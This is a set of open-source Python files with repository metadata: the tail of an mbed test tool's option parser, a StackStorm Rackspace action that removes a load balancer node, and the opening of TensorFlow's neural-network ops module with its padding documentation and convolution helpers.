help='For some commands you can use filter to filter out results')
parser.add_option('', '--inc-timeout',
dest='extend_test_timeout',
metavar="NUMBER",
type="int",
help='You can increase global timeout for each test by specifying additional test timeout in seconds')
parser.add_option('', '--db',
dest='db_url',
help='This specifies what database test suite uses to store its state. To pass DB connection info use database connection string. Example: \'mysql://username:password@127.0.0.1/db_name\'')
parser.add_option('-l', '--log',
dest='log_file_name',
help='Log events to external file (note not all console entries may be visible in log file)')
parser.add_option('', '--report-html',
dest='report_html_file_name',
help='You can log test suite results in form of HTML report')
parser.add_option('', '--report-junit',
dest='report_junit_file_name',
help='You can log test suite results in form of JUnit compliant XML report')
parser.add_option('', '--verbose-skipped',
dest='verbose_skipped_tests',
default=False,
action="store_true",
help='Prints some extra information about skipped tests')
parser.add_option('-V', '--verbose-test-result',
dest='verbose_test_result_only',
default=False,
action="store_true",
help='Prints test serial output')
parser.add_option('-v', '--verbose',
dest='verbose',
default=False,
action="store_true",
help='Verbose mode (prints some extra information)')
parser.add_option('', '--version',
dest='version',
default=False,
action="store_true",
help='Prints script version and exits')
return parser
| {
"content_hash": "25bac0fd1c1fd0d94e2657bb5f4a1506",
"timestamp": "",
"source": "github",
"line_count": 1652,
"max_line_length": 210,
"avg_line_length": 45.06113801452784,
"alnum_prop": 0.5490657030399914,
"repo_name": "sam-geek/mbed",
"id": "d52485286e1e301b309a9839fde0748bed26465f",
"size": "74441",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "workspace_tools/test_api.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "2677478"
},
{
"name": "C",
"bytes": "63927578"
},
{
"name": "C++",
"bytes": "5393205"
},
{
"name": "HTML",
"bytes": "439831"
},
{
"name": "Makefile",
"bytes": "181"
},
{
"name": "Objective-C",
"bytes": "424583"
},
{
"name": "Python",
"bytes": "510319"
},
{
"name": "Shell",
"bytes": "188"
}
],
"symlink_target": ""
} |
from lib.action import PyraxBaseAction
__all__ = [
'DeleteNodeFromLoadBalancerAction'
]
class DeleteNodeFromLoadBalancerAction(PyraxBaseAction):
def run(self, loadbalancer_id, ip):
clb = self.pyrax.cloud_loadbalancers
self.logger.info('Deleting node from loadbalancer...')
load_balancer = clb.get(loadbalancer_id)
target_ip = [node for node in load_balancer.nodes if node.address == ip][0]
target_ip.delete()
# Block until the load balancer becomes ACTIVE again after the node removal
self.pyrax.utils.wait_until(load_balancer, "status", "ACTIVE",
interval=1, attempts=30, verbose=True)
self.logger.info('Successfully removed node from loadbalancer: %s' % target_ip)
return target_ip
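# For illustration only (hypothetical identifiers): assuming this action is registered
# in the 'rackspace' pack under the same name as this file, it could be invoked with
# something like `st2 run rackspace.delete_node_from_loadbalancer loadbalancer_id=12345 ip=10.0.0.5`,
# which resolves the node by IP, deletes it and waits for the load balancer to return to ACTIVE.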
| {
"content_hash": "a50baeb864e020538964dcb2bb51c569",
"timestamp": "",
"source": "github",
"line_count": 25,
"max_line_length": 87,
"avg_line_length": 29.88,
"alnum_prop": 0.643908969210174,
"repo_name": "jtopjian/st2contrib",
"id": "e67efd75090361a60016725969d84601eb201ecb",
"size": "747",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packs/rackspace/actions/delete_node_from_loadbalancer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "851"
},
{
"name": "Python",
"bytes": "162337"
},
{
"name": "Shell",
"bytes": "1425"
}
],
"symlink_target": ""
} |
"""Primitive Neural Net (NN) Operations.
## Notes on padding
Several neural network operations, such as `tf.nn.conv2d` and
`tf.nn.max_pool2d`, take a `padding` parameter, which controls how the input is
padded before running the operation. The input is padded by inserting values
(typically zeros) before and after the tensor in each spatial dimension. The
`padding` parameter can either be the string `'VALID'`, which means use no
padding, or `'SAME'` which adds padding according to a formula which is
described below. Certain ops also allow the amount of padding per dimension to
be explicitly specified by passing a list to `padding`.
In the case of convolutions, the input is padded with zeros. In case of pools,
the padded input values are ignored. For example, in a max pool, the sliding
window ignores padded values, which is equivalent to the padded values being
`-infinity`.
### `'VALID'` padding
Passing `padding='VALID'` to an op causes no padding to be used. This causes the
output size to typically be smaller than the input size, even when the stride is
one. In the 2D case, the output size is computed as:
```
out_height = ceil((in_height - filter_height + 1) / stride_height)
out_width = ceil((in_width - filter_width + 1) / stride_width)
```
The 1D and 3D cases are similar. Note `filter_height` and `filter_width` refer
to the filter size after dilations (if any) for convolutions, and refer to the
window size for pools.
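For example, an illustrative shape computation using the `'VALID'` formula above
(same API as the `'SAME'` example below):

>>> inp = tf.ones((1, 5, 5, 1))
>>> filter = tf.ones((3, 3, 1, 1))
>>> output = tf.nn.conv2d(inp, filter, strides=[2, 2], padding='VALID')
>>> output.shape[1]  # out_height: ceil((5 - 3 + 1) / 2)
2
>>> output.shape[2]  # out_width: ceil((5 - 3 + 1) / 2)
2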
### `'SAME'` padding
With `'SAME'` padding, padding is applied to each spatial dimension. When the
strides are 1, the input is padded such that the output size is the same as the
input size. In the 2D case, the output size is computed as:
```
out_height = ceil(in_height / stride_height)
out_width = ceil(in_width / stride_width)
```
The amount of padding used is the smallest amount that results in the output
size. The formula for the total amount of padding per dimension is:
```
if (in_height % strides[1] == 0):
pad_along_height = max(filter_height - stride_height, 0)
else:
pad_along_height = max(filter_height - (in_height % stride_height), 0)
if (in_width % strides[2] == 0):
pad_along_width = max(filter_width - stride_width, 0)
else:
pad_along_width = max(filter_width - (in_width % stride_width), 0)
```
Finally, the padding on the top, bottom, left and right are:
```
pad_top = pad_along_height // 2
pad_bottom = pad_along_height - pad_top
pad_left = pad_along_width // 2
pad_right = pad_along_width - pad_left
```
Note that the division by 2 means that there might be cases when the padding on
both sides (top vs bottom, right vs left) are off by one. In this case, the
bottom and right sides always get the one additional padded pixel. For example,
when pad_along_height is 5, we pad 2 pixels at the top and 3 pixels at the
bottom. Note that this is different from existing libraries such as PyTorch and
Caffe, which explicitly specify the number of padded pixels and always pad the
same number of pixels on both sides.
Here is an example of `'SAME'` padding:
>>> in_height = 5
>>> filter_height = 3
>>> stride_height = 2
>>>
>>> in_width = 2
>>> filter_width = 2
>>> stride_width = 1
>>>
>>> inp = tf.ones((2, in_height, in_width, 2))
>>> filter = tf.ones((filter_height, filter_width, 2, 2))
>>> strides = [stride_height, stride_width]
>>> output = tf.nn.conv2d(inp, filter, strides, padding='SAME')
>>> output.shape[1] # output_height: ceil(5 / 2)
3
>>> output.shape[2] # output_width: ceil(2 / 1)
2
### Explicit padding
Certain ops, like `tf.nn.conv2d`, also allow a list of explicit padding amounts
to be passed to the `padding` parameter. This list is in the same format as what
is passed to `tf.pad`, except the padding must be a nested list, not a tensor.
For example, in the 2D case, the list is in the format `[[0, 0], [pad_top,
pad_bottom], [pad_left, pad_right], [0, 0]]` when `data_format` is its default
value of `'NHWC'`. The two `[0, 0]` pairs indicate the batch and channel
dimensions have no padding, which is required, as only spatial dimensions can
have padding.
For example:
>>> inp = tf.ones((1, 3, 3, 1))
>>> filter = tf.ones((2, 2, 1, 1))
>>> strides = [1, 1]
>>> padding = [[0, 0], [1, 2], [0, 1], [0, 0]]
>>> output = tf.nn.conv2d(inp, filter, strides, padding=padding)
>>> tuple(output.shape)
(1, 5, 3, 1)
>>> # Equivalently, tf.pad can be used, since convolutions pad with zeros.
>>> inp = tf.pad(inp, padding)
>>> # 'VALID' means to use no padding in conv2d (we already padded inp)
>>> output2 = tf.nn.conv2d(inp, filter, strides, padding='VALID')
>>> tf.debugging.assert_equal(output, output2)
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import numbers
import os
import numpy as np
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import graph_util
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import gen_math_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import variables as variables_lib
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_nn_ops import *
# pylint: enable=wildcard-import
from tensorflow.python.platform import device_context
from tensorflow.python.util import deprecation
from tensorflow.python.util import dispatch
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.deprecation import deprecated_args
from tensorflow.python.util.deprecation import deprecated_argument_lookup
from tensorflow.python.util.tf_export import tf_export
# Aliases for some automatically-generated names.
local_response_normalization = gen_nn_ops.lrn
# pylint: disable=protected-access
# Acceptable channels last formats (robust to H, W, D order).
_CHANNELS_LAST_FORMATS = frozenset({
"NWC", "NHC", "NHWC", "NWHC", "NDHWC", "NDWHC", "NHDWC", "NHWDC", "NWDHC",
"NWHDC"
})
def _get_sequence(value, n, channel_index, name):
"""Formats a value input for gen_nn_ops."""
# Performance is fast-pathed for common cases:
# `None`, `list`, `tuple` and `int`.
if value is None:
return [1] * (n + 2)
# Always convert `value` to a `list`.
if isinstance(value, list):
pass
elif isinstance(value, tuple):
value = list(value)
elif isinstance(value, int):
value = [value]
elif not isinstance(value, collections_abc.Sized):
value = [value]
else:
value = list(value) # Try casting to a list.
len_value = len(value)
# Fully specified, including batch and channel dims.
if len_value == n + 2:
return value
# Apply value to spatial dims only.
if len_value == 1:
value = value * n # Broadcast to spatial dimensions.
elif len_value != n:
raise ValueError("{} should be of length 1, {} or {} but was {}".format(
name, n, n + 2, len_value))
# Add batch and channel dims (always 1).
if channel_index == 1:
return [1, 1] + value
else:
return [1] + value + [1]
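# Illustrative examples (hypothetical arguments): _get_sequence(2, 2, 3, "strides")
# broadcasts the scalar over the two spatial dims and returns [1, 2, 2, 1]
# (channels-last), while _get_sequence([2, 3], 2, 1, "strides") returns
# [1, 1, 2, 3] (channels-first).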
def _non_atrous_convolution(
input, # pylint: disable=redefined-builtin
filter, # pylint: disable=redefined-builtin
padding,
data_format=None, # pylint: disable=redefined-builtin
strides=None,
name=None):
"""Computes sums of N-D convolutions (actually cross correlation).
It is required that 1 <= N <= 3.
This is used to implement the more generic `convolution` function, which
extends the interface of this function with a `dilation_rate` parameter.
Args:
input: Rank N+2 tensor of type T of shape
`[batch_size] + input_spatial_shape + [in_channels]` if `data_format`
does not start with `"NC"`, or
`[batch_size, in_channels] + input_spatial_shape` if `data_format` starts
with `"NC"`.
filter: Rank N+2 tensor of type T of shape
`filter_spatial_shape + [in_channels, out_channels]`. Rank of either
`input` or `filter` must be known.
padding: Padding method to use, must be either "VALID" or "SAME".
data_format: A string or None. Specifies whether the channel dimension of
the `input` and output is the last dimension (default, or if `data_format`
does not start with "NC"), or the second dimension (if `data_format`
starts with "NC"). For N=1, the valid values are "NWC" (default) and
"NCW". For N=2, the valid values are "NHWC" (default) and "NCHW".
For N=3, the valid values are "NDHWC" (default) and "NCDHW".
strides: Sequence of N positive integers, defaults to `[1] * N`.
name: Name prefix to use.
Returns:
Rank N+2 tensor of type T of shape
`[batch_size] + output_spatial_shape + [out_channels]`, where
if padding == "SAME":
output_spatial_shape = input_spatial_shape
if padding == "VALID":
output_spatial_shape = input_spatial_shape - filter_spatial_shape + 1.
Raises:
ValueError: if ranks are incompatible.
"""
with ops.name_scope(name, "non_atrous_convolution", [input, filter]) as scope:
input = ops.convert_to_tensor(input, name="input") # pylint: disable=redefined-builtin
input_shape = input.shape
filter = ops.convert_to_tensor(filter, name="filter") # pylint: disable=redefined-builtin
filter_shape = filter.shape
op = _NonAtrousConvolution(
input_shape,
filter_shape=filter_shape,
padding=padding,
data_format=data_format,
strides=strides,
name=scope)
return op(input, filter)
class _NonAtrousConvolution(object):
"""Helper class for _non_atrous_convolution.
Note that this class assumes that shapes of input and filter passed to
`__call__` are compatible with `input_shape` and filter_shape passed to the
constructor.
Args:
input_shape: static input shape, i.e. input.shape.
filter_shape: static filter shape, i.e. filter.shape.
padding: see _non_atrous_convolution.
data_format: see _non_atrous_convolution.
strides: see _non_atrous_convolution.
name: see _non_atrous_convolution.
num_batch_dims: (Optional.) The number of batch dimensions in the input;
if not provided, the default of `1` is used.
"""
def __init__(
self,
input_shape,
filter_shape,
padding,
data_format=None,
strides=None,
name=None,
num_batch_dims=1):
# filter shape is always rank num_spatial_dims + 2
# and num_spatial_dims == input_shape.ndims - num_batch_dims - 1
if input_shape.ndims is not None:
filter_shape = filter_shape.with_rank(
input_shape.ndims - num_batch_dims + 1)
self.padding = padding
self.name = name
# input shape is == num_spatial_dims + num_batch_dims + 1
# and filter_shape is always rank num_spatial_dims + 2
if filter_shape.ndims is not None:
input_shape = input_shape.with_rank(
filter_shape.ndims + num_batch_dims - 1)
if input_shape.ndims is None:
raise ValueError(
"Rank of convolution must be known, but saw input_shape.ndims == {}"
.format(input_shape.ndims))
if input_shape.ndims < 3 or input_shape.ndims - num_batch_dims + 1 > 5:
raise ValueError(
"`input_shape.ndims - num_batch_dims + 1` must be at least 3 and at "
"most 5 but saw `input_shape.ndims == {}` and `num_batch_dims == {}`"
.format(input_shape.ndims, num_batch_dims))
conv_dims = input_shape.ndims - num_batch_dims - 1
if strides is None:
strides = [1] * conv_dims
elif len(strides) != conv_dims:
raise ValueError("len(strides)=%d, but should be %d" % (len(strides),
conv_dims))
if conv_dims == 1:
# conv1d uses the 2-d data format names
if data_format is None:
data_format = "NWC"
elif data_format not in {"NCW", "NWC", "NCHW", "NHWC"}:
raise ValueError("data_format must be \"NWC\" or \"NCW\".")
self.strides = strides[0]
self.data_format = data_format
self.conv_op = self._conv1d
elif conv_dims == 2:
if data_format is None or data_format == "NHWC":
data_format = "NHWC"
strides = [1] + list(strides) + [1]
elif data_format == "NCHW":
strides = [1, 1] + list(strides)
else:
raise ValueError("data_format must be \"NHWC\" or \"NCHW\".")
self.strides = strides
self.data_format = data_format
self.conv_op = conv2d
elif conv_dims == 3:
if data_format is None or data_format == "NDHWC":
strides = [1] + list(strides) + [1]
elif data_format == "NCDHW":
strides = [1, 1] + list(strides)
else:
raise ValueError("data_format must be \"NDHWC\" or \"NCDHW\". Have: %s"
% data_format)
self.strides = strides
self.data_format = data_format
self.conv_op = _conv3d_expanded_batch
# Note that we need this adapter since argument names for conv1d don't match
# those for gen_nn_ops.conv2d and gen_nn_ops.conv3d.
# pylint: disable=redefined-builtin
def _conv1d(self, input, filter, strides, padding, data_format, name):
return conv1d(
value=input,
filters=filter,
stride=strides,
padding=padding,
data_format=data_format,
name=name)
# pylint: enable=redefined-builtin
def __call__(self, inp, filter): # pylint: disable=redefined-builtin
return self.conv_op(
input=inp,
filter=filter,
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
name=self.name)
def squeeze_batch_dims(inp, op, inner_rank, name=None):
"""Returns `unsqueeze_batch(op(squeeze_batch(inp)))`.
Where `squeeze_batch` reshapes `inp` to shape
`[prod(inp.shape[:-inner_rank])] + inp.shape[-inner_rank:]`
and `unsqueeze_batch` does the reverse reshape but on the output.
Args:
inp: A tensor with dims `batch_shape + inner_shape` where `inner_shape`
is length `inner_rank`.
op: A callable that takes a single input tensor and returns a single
output tensor.
inner_rank: A python integer.
name: A string.
Returns:
`unsqueeze_batch_op(squeeze_batch(inp))`.
"""
with ops.name_scope(name, "squeeze_batch_dims", [inp]):
inp = ops.convert_to_tensor(inp, name="input")
shape = inp.shape
inner_shape = shape[-inner_rank:]
if not inner_shape.is_fully_defined():
inner_shape = array_ops.shape(inp)[-inner_rank:]
batch_shape = shape[:-inner_rank]
if not batch_shape.is_fully_defined():
batch_shape = array_ops.shape(inp)[:-inner_rank]
if isinstance(inner_shape, tensor_shape.TensorShape):
inp_reshaped = array_ops.reshape(inp, [-1] + inner_shape.as_list())
else:
inp_reshaped = array_ops.reshape(
inp, array_ops.concat(([-1], inner_shape), axis=-1))
out_reshaped = op(inp_reshaped)
out_inner_shape = out_reshaped.shape[-inner_rank:]
if not out_inner_shape.is_fully_defined():
out_inner_shape = array_ops.shape(out_reshaped)[-inner_rank:]
out = array_ops.reshape(
out_reshaped, array_ops.concat((batch_shape, out_inner_shape), axis=-1))
out.set_shape(inp.shape[:-inner_rank] + out.shape[-inner_rank:])
return out
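# Illustrative note (hypothetical shapes): with `inp` of shape [2, 3, 4, 5] and
# inner_rank=2, `op` receives a tensor reshaped to [6, 4, 5]; if `op` keeps the
# inner shape, the result is reshaped back to [2, 3, 4, 5].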
@tf_export("nn.dilation2d", v1=[])
@dispatch.add_dispatch_support
def dilation2d_v2(
input, # pylint: disable=redefined-builtin
filters, # pylint: disable=redefined-builtin
strides,
padding,
data_format,
dilations,
name=None):
"""Computes the grayscale dilation of 4-D `input` and 3-D `filters` tensors.
The `input` tensor has shape `[batch, in_height, in_width, depth]` and the
`filters` tensor has shape `[filter_height, filter_width, depth]`, i.e., each
input channel is processed independently of the others with its own
structuring function. The `output` tensor has shape
`[batch, out_height, out_width, depth]`. The spatial dimensions of the output
tensor depend on the `padding` algorithm. We currently only support the
default "NHWC" `data_format`.
In detail, the grayscale morphological 2-D dilation is the max-sum correlation
(for consistency with `conv2d`, we use unmirrored filters):
output[b, y, x, c] =
max_{dy, dx} input[b,
strides[1] * y + rates[1] * dy,
strides[2] * x + rates[2] * dx,
c] +
filters[dy, dx, c]
Max-pooling is a special case when the filter has size equal to the pooling
kernel size and contains all zeros.
Note on duality: The dilation of `input` by the `filters` is equal to the
negation of the erosion of `-input` by the reflected `filters`.
Args:
input: A `Tensor`. Must be one of the following types: `float32`, `float64`,
`int32`, `uint8`, `int16`, `int8`, `int64`, `bfloat16`, `uint16`, `half`,
`uint32`, `uint64`.
4-D with shape `[batch, in_height, in_width, depth]`.
filters: A `Tensor`. Must have the same type as `input`.
3-D with shape `[filter_height, filter_width, depth]`.
strides: A list of `ints` that has length `>= 4`.
The stride of the sliding window for each dimension of the input
tensor. Must be: `[1, stride_height, stride_width, 1]`.
padding: A `string` from: `"SAME", "VALID"`.
The type of padding algorithm to use.
data_format: A `string`, only `"NHWC"` is currently supported.
dilations: A list of `ints` that has length `>= 4`.
The input stride for atrous morphological dilation. Must be:
`[1, rate_height, rate_width, 1]`.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `input`.
"""
if data_format != "NHWC":
raise ValueError("Data formats other than NHWC are not yet supported")
return gen_nn_ops.dilation2d(input=input,
filter=filters,
strides=strides,
rates=dilations,
padding=padding,
name=name)
@tf_export(v1=["nn.dilation2d"])
@dispatch.add_dispatch_support
def dilation2d_v1( # pylint: disable=missing-docstring
input, # pylint: disable=redefined-builtin
filter=None, # pylint: disable=redefined-builtin
strides=None,
rates=None,
padding=None,
name=None,
filters=None,
dilations=None):
filter = deprecated_argument_lookup("filters", filters, "filter", filter)
rates = deprecated_argument_lookup("dilations", dilations, "rates", rates)
return gen_nn_ops.dilation2d(input, filter, strides, rates, padding, name)
dilation2d_v1.__doc__ = gen_nn_ops.dilation2d.__doc__
@tf_export("nn.with_space_to_batch")
@dispatch.add_dispatch_support
def with_space_to_batch(
input, # pylint: disable=redefined-builtin
dilation_rate,
padding,
op,
filter_shape=None,
spatial_dims=None,
data_format=None):
"""Performs `op` on the space-to-batch representation of `input`.
This has the effect of transforming sliding window operations into the
corresponding "atrous" operation in which the input is sampled at the
specified `dilation_rate`.
In the special case that `dilation_rate` is uniformly 1, this simply returns:
op(input, num_spatial_dims, padding)
Otherwise, it returns:
batch_to_space_nd(
    op(space_to_batch_nd(input, adjusted_dilation_rate, adjusted_paddings),
       num_spatial_dims,
       "VALID"),
    adjusted_dilation_rate,
    adjusted_crops),
where:
adjusted_dilation_rate is an int64 tensor of shape [max(spatial_dims)],
adjusted_{paddings,crops} are int64 tensors of shape [max(spatial_dims), 2]
defined as follows:
We first define two int64 tensors `paddings` and `crops` of shape
`[num_spatial_dims, 2]` based on the value of `padding` and the spatial
dimensions of the `input`:
If `padding = "VALID"`, then:
paddings, crops = required_space_to_batch_paddings(
input_shape[spatial_dims],
dilation_rate)
If `padding = "SAME"`, then:
dilated_filter_shape =
filter_shape + (filter_shape - 1) * (dilation_rate - 1)
paddings, crops = required_space_to_batch_paddings(
input_shape[spatial_dims],
dilation_rate,
[(dilated_filter_shape - 1) // 2,
dilated_filter_shape - 1 - (dilated_filter_shape - 1) // 2])
Because `space_to_batch_nd` and `batch_to_space_nd` assume that the spatial
dimensions are contiguous starting at the second dimension, but the specified
`spatial_dims` may not be, we must adjust `dilation_rate`, `paddings` and
`crops` in order to be usable with these operations. For a given dimension,
if the block size is 1, and both the starting and ending padding and crop
amounts are 0, then space_to_batch_nd effectively leaves that dimension alone,
which is what is needed for dimensions not part of `spatial_dims`.
Furthermore, `space_to_batch_nd` and `batch_to_space_nd` handle this case
efficiently for any number of leading and trailing dimensions.
For 0 <= i < len(spatial_dims), we assign:
adjusted_dilation_rate[spatial_dims[i] - 1] = dilation_rate[i]
adjusted_paddings[spatial_dims[i] - 1, :] = paddings[i, :]
adjusted_crops[spatial_dims[i] - 1, :] = crops[i, :]
All unassigned values of `adjusted_dilation_rate` default to 1, while all
unassigned values of `adjusted_paddings` and `adjusted_crops` default to 0.
Note in the case that `dilation_rate` is not uniformly 1, specifying "VALID"
padding is equivalent to specifying `padding = "SAME"` with a filter_shape of
`[1]*N`.
Advanced usage. Note the following optimization: A sequence of
`with_space_to_batch` operations with identical (not uniformly 1)
`dilation_rate` parameters and "VALID" padding
net = with_space_to_batch(net, dilation_rate, "VALID", op_1)
...
net = with_space_to_batch(net, dilation_rate, "VALID", op_k)
can be combined into a single `with_space_to_batch` operation as follows:
def combined_op(converted_input, num_spatial_dims, _):
result = op_1(converted_input, num_spatial_dims, "VALID")
...
result = op_k(result, num_spatial_dims, "VALID")
net = with_space_to_batch(net, dilation_rate, "VALID", combined_op)
This eliminates the overhead of `k-1` calls to `space_to_batch_nd` and
`batch_to_space_nd`.
Similarly, a sequence of `with_space_to_batch` operations with identical (not
uniformly 1) `dilation_rate` parameters, "SAME" padding, and odd filter
dimensions
net = with_space_to_batch(net, dilation_rate, "SAME", op_1, filter_shape_1)
...
net = with_space_to_batch(net, dilation_rate, "SAME", op_k, filter_shape_k)
can be combined into a single `with_space_to_batch` operation as follows:
def combined_op(converted_input, num_spatial_dims, _):
result = op_1(converted_input, num_spatial_dims, "SAME")
...
result = op_k(result, num_spatial_dims, "SAME")
net = with_space_to_batch(net, dilation_rate, "VALID", combined_op)
Args:
input: Tensor of rank > max(spatial_dims).
dilation_rate: int32 Tensor of *known* shape [num_spatial_dims].
padding: str constant equal to "VALID" or "SAME"
op: Function that maps (input, num_spatial_dims, padding) -> output
filter_shape: If padding = "SAME", specifies the shape of the convolution
kernel/pooling window as an integer Tensor of shape [>=num_spatial_dims].
If padding = "VALID", filter_shape is ignored and need not be specified.
spatial_dims: Monotonically increasing sequence of `num_spatial_dims`
integers (which are >= 1) specifying the spatial dimensions of `input`
and output. Defaults to: `range(1, num_spatial_dims+1)`.
data_format: A string or None. Specifies whether the channel dimension of
the `input` and output is the last dimension (default, or if `data_format`
does not start with "NC"), or the second dimension (if `data_format`
starts with "NC"). For N=1, the valid values are "NWC" (default) and
"NCW". For N=2, the valid values are "NHWC" (default) and "NCHW".
For N=3, the valid values are "NDHWC" (default) and "NCDHW".
Returns:
The output Tensor as described above, dimensions will vary based on the op
provided.
Raises:
ValueError: if `padding` is invalid or the arguments are incompatible.
ValueError: if `spatial_dims` are invalid.
"""
input = ops.convert_to_tensor(input, name="input") # pylint: disable=redefined-builtin
input_shape = input.shape
def build_op(num_spatial_dims, padding):
return lambda inp, _: op(inp, num_spatial_dims, padding)
new_op = _WithSpaceToBatch(
input_shape,
dilation_rate,
padding,
build_op,
filter_shape=filter_shape,
spatial_dims=spatial_dims,
data_format=data_format)
return new_op(input, None)
class _WithSpaceToBatch(object):
"""Helper class for with_space_to_batch.
Note that this class assumes that shapes of input and filter passed to
`__call__` are compatible with `input_shape`, `filter_shape`, and
`spatial_dims` passed to the constructor.
Arguments
input_shape: static shape of input. i.e. input.shape.
dilation_rate: see `with_space_to_batch`.
padding: see `with_space_to_batch`.
build_op: Function that maps (num_spatial_dims, paddings) -> (function that
maps (input, filter) -> output).
filter_shape: see `with_space_to_batch`.
spatial_dims: see `with_space_to_batch`.
data_format: see `with_space_to_batch`.
num_batch_dims: (Optional). Number of batch dims in `input_shape`.
"""
def __init__(self,
input_shape,
dilation_rate,
padding,
build_op,
filter_shape=None,
spatial_dims=None,
data_format=None,
num_batch_dims=1):
"""Helper class for _with_space_to_batch."""
dilation_rate = ops.convert_to_tensor(
dilation_rate, dtypes.int32, name="dilation_rate")
if dilation_rate.shape.ndims not in (None, 1):
raise ValueError(
"rate must be rank 1 but saw {}".format(dilation_rate.shape.ndims))
if not dilation_rate.shape.is_fully_defined():
raise ValueError("rate must have known shape, but saw {}"
.format(dilation_rate.shape))
num_spatial_dims = dilation_rate.shape.dims[0].value
if data_format is not None and data_format.startswith("NC"):
starting_spatial_dim = num_batch_dims + 1
else:
starting_spatial_dim = num_batch_dims
if spatial_dims is None:
spatial_dims = range(starting_spatial_dim,
num_spatial_dims + starting_spatial_dim)
orig_spatial_dims = list(spatial_dims)
spatial_dims = sorted(set(int(x) for x in orig_spatial_dims))
if spatial_dims != orig_spatial_dims or any(x < 1 for x in spatial_dims):
raise ValueError(
"spatial_dims must be a monotonically increasing sequence of "
"positive integers, but saw: {}".format(orig_spatial_dims))
if data_format is not None and data_format.startswith("NC"):
expected_input_rank = spatial_dims[-1]
else:
expected_input_rank = spatial_dims[-1] + 1
try:
input_shape.with_rank_at_least(expected_input_rank)
except ValueError:
raise ValueError(
"input tensor must have rank at least {}, but saw rank {}"
.format(expected_input_rank, input_shape.ndims))
const_rate = tensor_util.constant_value(dilation_rate)
rate_or_const_rate = dilation_rate
if const_rate is not None:
rate_or_const_rate = const_rate
if np.any(const_rate < 1):
raise ValueError("dilation_rate must be positive, but saw: {}"
.format(const_rate))
if np.all(const_rate == 1):
self.call = build_op(num_spatial_dims, padding)
return
padding, explicit_paddings = convert_padding(padding)
# We have two padding contributions. The first is used for converting "SAME"
# to "VALID". The second is required so that the height and width of the
# zero-padded value tensor are multiples of rate.
# Padding required to reduce to "VALID" convolution
if padding == "SAME":
if filter_shape is None:
raise ValueError("filter_shape must be specified for SAME padding")
filter_shape = ops.convert_to_tensor(filter_shape, name="filter_shape")
const_filter_shape = tensor_util.constant_value(filter_shape)
if const_filter_shape is not None:
filter_shape = const_filter_shape
self.base_paddings = _with_space_to_batch_base_paddings(
const_filter_shape, num_spatial_dims, rate_or_const_rate)
else:
self.num_spatial_dims = num_spatial_dims
self.rate_or_const_rate = rate_or_const_rate
self.base_paddings = None
elif padding == "VALID":
self.base_paddings = np.zeros([num_spatial_dims, 2], np.int32)
elif padding == "EXPLICIT":
base_paddings = (np.array(explicit_paddings)
.reshape([num_spatial_dims + 2, 2]))
# Remove batch and channel dimensions
if data_format is not None and data_format.startswith("NC"):
self.base_paddings = base_paddings[2:]
else:
self.base_paddings = base_paddings[1:-1]
else:
raise ValueError("Invalid padding method %r" % padding)
self.input_shape = input_shape
self.spatial_dims = spatial_dims
self.dilation_rate = dilation_rate
self.data_format = data_format
self.op = build_op(num_spatial_dims, "VALID")
self.call = self._with_space_to_batch_call
def _with_space_to_batch_call(self, inp, filter): # pylint: disable=redefined-builtin
"""Call functionality for with_space_to_batch."""
# Handle input whose shape is unknown during graph creation.
input_spatial_shape = None
input_shape = self.input_shape
spatial_dims = self.spatial_dims
if input_shape.ndims is not None:
input_shape_list = input_shape.as_list()
input_spatial_shape = [input_shape_list[i] for i in spatial_dims]
if input_spatial_shape is None or None in input_spatial_shape:
input_shape_tensor = array_ops.shape(inp)
input_spatial_shape = array_ops.stack(
[input_shape_tensor[i] for i in spatial_dims])
base_paddings = self.base_paddings
if base_paddings is None:
# base_paddings could not be computed at build time since static filter
# shape was not fully defined.
filter_shape = array_ops.shape(filter)
base_paddings = _with_space_to_batch_base_paddings(
filter_shape, self.num_spatial_dims, self.rate_or_const_rate)
paddings, crops = array_ops.required_space_to_batch_paddings(
input_shape=input_spatial_shape,
base_paddings=base_paddings,
block_shape=self.dilation_rate)
dilation_rate = _with_space_to_batch_adjust(self.dilation_rate, 1,
spatial_dims)
paddings = _with_space_to_batch_adjust(paddings, 0, spatial_dims)
crops = _with_space_to_batch_adjust(crops, 0, spatial_dims)
input_converted = array_ops.space_to_batch_nd(
input=inp, block_shape=dilation_rate, paddings=paddings)
result = self.op(input_converted, filter)
result_converted = array_ops.batch_to_space_nd(
input=result, block_shape=dilation_rate, crops=crops)
# Recover channel information for output shape if channels are not last.
if self.data_format is not None and self.data_format.startswith("NC"):
if not result_converted.shape.dims[1].value and filter is not None:
output_shape = result_converted.shape.as_list()
output_shape[1] = filter.shape[-1]
result_converted.set_shape(output_shape)
return result_converted
def __call__(self, inp, filter): # pylint: disable=redefined-builtin
return self.call(inp, filter)
def _with_space_to_batch_base_paddings(filter_shape, num_spatial_dims,
rate_or_const_rate):
"""Helper function to compute base_paddings."""
# Spatial dimensions of the filters and the upsampled filters in which we
# introduce (rate - 1) zeros between consecutive filter values.
filter_spatial_shape = filter_shape[:num_spatial_dims]
pad_extra_shape = (filter_spatial_shape - 1) * rate_or_const_rate
# When full_padding_shape is odd, we pad more at end, following the same
# convention as conv2d.
pad_extra_start = pad_extra_shape // 2
pad_extra_end = pad_extra_shape - pad_extra_start
base_paddings = array_ops.stack(
[[pad_extra_start[i], pad_extra_end[i]] for i in range(num_spatial_dims)])
return base_paddings
def _with_space_to_batch_adjust(orig, fill_value, spatial_dims):
"""Returns an `adjusted` version of `orig` based on `spatial_dims`.
